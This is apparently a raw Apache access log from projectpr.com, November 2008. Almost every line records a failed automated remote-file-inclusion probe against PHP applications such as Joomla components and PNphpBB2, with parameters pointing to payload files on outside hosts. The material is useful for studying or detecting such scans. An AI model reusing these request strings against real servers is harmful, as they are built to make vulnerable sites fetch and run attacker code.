189.103.65.167 - - [11/Nov/2008:19:53:02 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hempstylemito.xpg.com.br/fodase/id1scambom.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
189.103.65.167 - - [11/Nov/2008:19:53:03 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hempstylemito.xpg.com.br/fodase/id1scambom.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
91.184.4.157 - - [11/Nov/2008:19:55:58 -0800] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:19:57:19 -0800] "GET /errors.php?error=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:19:57:19 -0800] "GET /logs/access_070812.log/errors.php?error=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:19:57:19 -0800] "GET /logs/access_070712.log/errors.php?error=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:19:57:19 -0800] "GET /logs/errors.php?error=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.172.232.107 - - [11/Nov/2008:19:57:36 -0800] "GET /logs/access_070812.log/errors.php?error=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
211.172.232.107 - - [11/Nov/2008:19:57:36 -0800] "GET /errors.php?error=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
211.172.232.107 - - [11/Nov/2008:19:57:37 -0800] "GET /logs/access_070712.log/errors.php?error=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
211.172.232.107 - - [11/Nov/2008:19:57:37 -0800] "GET /logs/errors.php?error=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
70.38.54.118 - - [11/Nov/2008:19:58:29 -0800] "GET /logs/access.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.projectpr.com"
70.38.54.118 - - [11/Nov/2008:19:58:29 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.projectpr.com"
70.38.54.118 - - [11/Nov/2008:19:58:29 -0800] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.projectpr.com"
85.214.86.238 - - [11/Nov/2008:20:01:32 -0800] "GET /logs/access_070712.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.86.238 - - [11/Nov/2008:20:01:32 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.86.238 - - [11/Nov/2008:20:01:33 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.86.238 - - [11/Nov/2008:20:05:23 -0800] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.86.238 - - [11/Nov/2008:20:05:23 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.214.86.238 - - [11/Nov/2008:20:06:01 -0800] "GET /logs/access_070812.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
208.80.194.40 - - [11/Nov/2008:20:06:48 -0800] "GET / HTTP/1.0" 200 10027 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; iebar; acc=vonner; FreeprodTB; (vonner); (none); .NET CLR 1.1.4322)" "projectpr.com"
130.206.76.41 - - [11/Nov/2008:20:10:09 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.30.81.156 - - [11/Nov/2008:20:10:22 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
130.206.76.41 - - [11/Nov/2008:20:12:29 -0800] "GET /logs/access_071112.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
154.5.252.194 - - [11/Nov/2008:20:14:46 -0800] "GET /logs/access_070812.log//modules/xfsection/modify.php?dir_module=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
154.5.252.194 - - [11/Nov/2008:20:15:06 -0800] "GET /logs/access_070812.log//modules/xfsection/modify.php?dir_module=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
130.206.76.41 - - [11/Nov/2008:20:17:24 -0800] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
130.206.76.41 - - [11/Nov/2008:20:17:25 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
130.206.76.41 - - [11/Nov/2008:20:17:25 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
130.206.76.41 - - [11/Nov/2008:20:17:32 -0800] "GET /logs/access_071012.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.221.112.34 - - [11/Nov/2008:20:18:43 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.deepinsidethemind.com//plugins/safehtml/gif/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
203.114.112.155 - - [11/Nov/2008:20:20:30 -0800] "GET /logs/access_070912.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.searchapedia.com/community/communityimages/f_farkle/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
89.186.1.54 - - [11/Nov/2008:20:21:01 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.projectpr.com"
89.186.1.54 - - [11/Nov/2008:20:21:01 -0800] "GET /lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.projectpr.com"
89.186.1.54 - - [11/Nov/2008:20:21:01 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.projectpr.com"
24.63.144.198 - - [11/Nov/2008:20:21:15 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.deepinsidethemind.com//plugins/safehtml/gif/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
78.83.251.233 - - [11/Nov/2008:20:26:59 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://weblime.ru/seahorse/joomla??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
78.83.251.233 - - [11/Nov/2008:20:27:00 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://weblime.ru/seahorse/joomla??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.projectpr.com"
202.144.158.163 - - [11/Nov/2008:20:38:07 -0800] "GET /logs/access_080312.log/index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
202.144.158.163 - - [11/Nov/2008:20:38:09 -0800] "GET /index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
202.144.158.163 - - [11/Nov/2008:20:38:11 -0800] "GET /logs/index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
202.144.158.163 - - [11/Nov/2008:20:38:41 -0800] "GET /logs/access_080312.log/index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
202.144.158.163 - - [11/Nov/2008:20:38:43 -0800] "GET /index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
202.144.158.163 - - [11/Nov/2008:20:38:45 -0800] "GET /logs/index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
203.114.112.155 - - [11/Nov/2008:20:39:11 -0800] "GET /lostpasswd.php?env[include_prefix]=http://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
203.114.112.155 - - [11/Nov/2008:20:39:11 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
203.114.112.155 - - [11/Nov/2008:20:39:11 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
202.160.180.98 - - [11/Nov/2008:20:42:47 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.projectpr.com"
202.160.180.81 - - [11/Nov/2008:20:42:48 -0800] "GET / HTTP/1.0" 200 10027 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:20:44:09 -0800] "GET /logs/access_070912.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:20:44:09 -0800] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:20:44:10 -0800] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:20:44:48 -0800] "GET /logs/access_070812.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:20:45:56 -0800] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:20:45:56 -0800] "GET /logs/access_070912.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:20:45:56 -0800] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.78.225.23 - - [11/Nov/2008:20:46:47 -0800] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
121.78.225.23 - - [11/Nov/2008:20:46:47 -0800] "GET /logs/access_070912.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
121.78.225.23 - - [11/Nov/2008:20:46:47 -0800] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:20:46:49 -0800] "GET /logs/access_070912.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:20:46:49 -0800] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:20:46:50 -0800] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:20:46:56 -0800] "GET /logs/access_070812.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:20:47:06 -0800] "GET /logs/access_070812.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.78.225.23 - - [11/Nov/2008:20:47:07 -0800] "GET /logs/access_070812.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:20:48:08 -0800] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
77.232.68.17 - - [11/Nov/2008:20:48:14 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_popupgoods.php?shop_this_skin_path=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
77.232.68.17 - - [11/Nov/2008:20:48:14 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_popupgoods.php?shop_this_skin_path=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
77.232.68.17 - - [11/Nov/2008:20:48:14 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_popupgoods.php?shop_this_skin_path=http://mudalige.com//ezg_data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
121.125.79.167 - - [11/Nov/2008:20:48:37 -0800] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
121.125.79.167 - - [11/Nov/2008:20:48:37 -0800] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
121.125.79.167 - - [11/Nov/2008:20:48:37 -0800] "GET /logs/access_070912.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:20:48:49 -0800] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:20:48:49 -0800] "GET /administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:20:48:49 -0800] "GET /logs/access_070912.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:48:59 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:48:59 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:48:59 -0800] "GET /logs/access_070912.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.125.79.167 - - [11/Nov/2008:20:49:12 -0800] "GET /logs/access_070812.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.westwoodchristian.com/Gang11/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
201.94.235.191 - - [11/Nov/2008:20:49:26 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
201.94.235.191 - - [11/Nov/2008:20:49:26 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
201.94.235.191 - - [11/Nov/2008:20:49:29 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:20:49:32 -0800] "GET /logs/access_070812.log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:50:14 -0800] "GET /logs/access_071112.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:50:14 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:50:14 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
98.199.39.40 - - [11/Nov/2008:20:50:32 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
200.87.171.78 - - [11/Nov/2008:20:50:39 -0800] "GET /logs/access.log%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.87.171.78 - - [11/Nov/2008:20:50:39 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.87.171.78 - - [11/Nov/2008:20:50:39 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
98.199.39.40 - - [11/Nov/2008:20:50:44 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
98.199.39.40 - - [11/Nov/2008:20:50:46 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
77.232.68.17 - - [11/Nov/2008:20:51:27 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.the-whisky-clan.net/forum/files/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
77.232.68.17 - - [11/Nov/2008:20:51:27 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.the-whisky-clan.net/forum/files/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
77.232.68.17 - - [11/Nov/2008:20:51:28 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.the-whisky-clan.net/forum/files/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
201.94.235.191 - - [11/Nov/2008:20:51:30 -0800] "GET /logs/access.log%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
203.114.112.155 - - [11/Nov/2008:20:52:53 -0800] "GET /logs/access_080512.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.searchapedia.com/community/communityimages/f_farkle/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "projectpr.com"
203.114.112.155 - - [11/Nov/2008:20:52:54 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.searchapedia.com/community/communityimages/f_farkle/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "projectpr.com"
203.114.112.155 - - [11/Nov/2008:20:52:55 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.searchapedia.com/community/communityimages/f_farkle/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:54:14 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:54:17 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:54:21 -0800] "GET /logs/access_070912.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
98.199.39.40 - - [11/Nov/2008:20:55:05 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://usuarios.lycos.es/qweqwe123/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:58:49 -0800] "GET /logs/access_070812.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:59:01 -0800] "GET /logs/access_070912.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
58.227.192.80 - - [11/Nov/2008:20:59:05 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.minart.org/bbs/data/a3.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
77.232.68.17 - - [11/Nov/2008:20:59:59 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.the-whisky-clan.net/forum/files/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
74.52.71.162 - - [11/Nov/2008:21:00:57 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.natuurenwetenschap.be/banners/id2??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
74.52.71.162 - - [11/Nov/2008:21:00:57 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.natuurenwetenschap.be/banners/id2??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
74.52.71.162 - - [11/Nov/2008:21:00:57 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.natuurenwetenschap.be/banners/id2??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.projectpr.com"
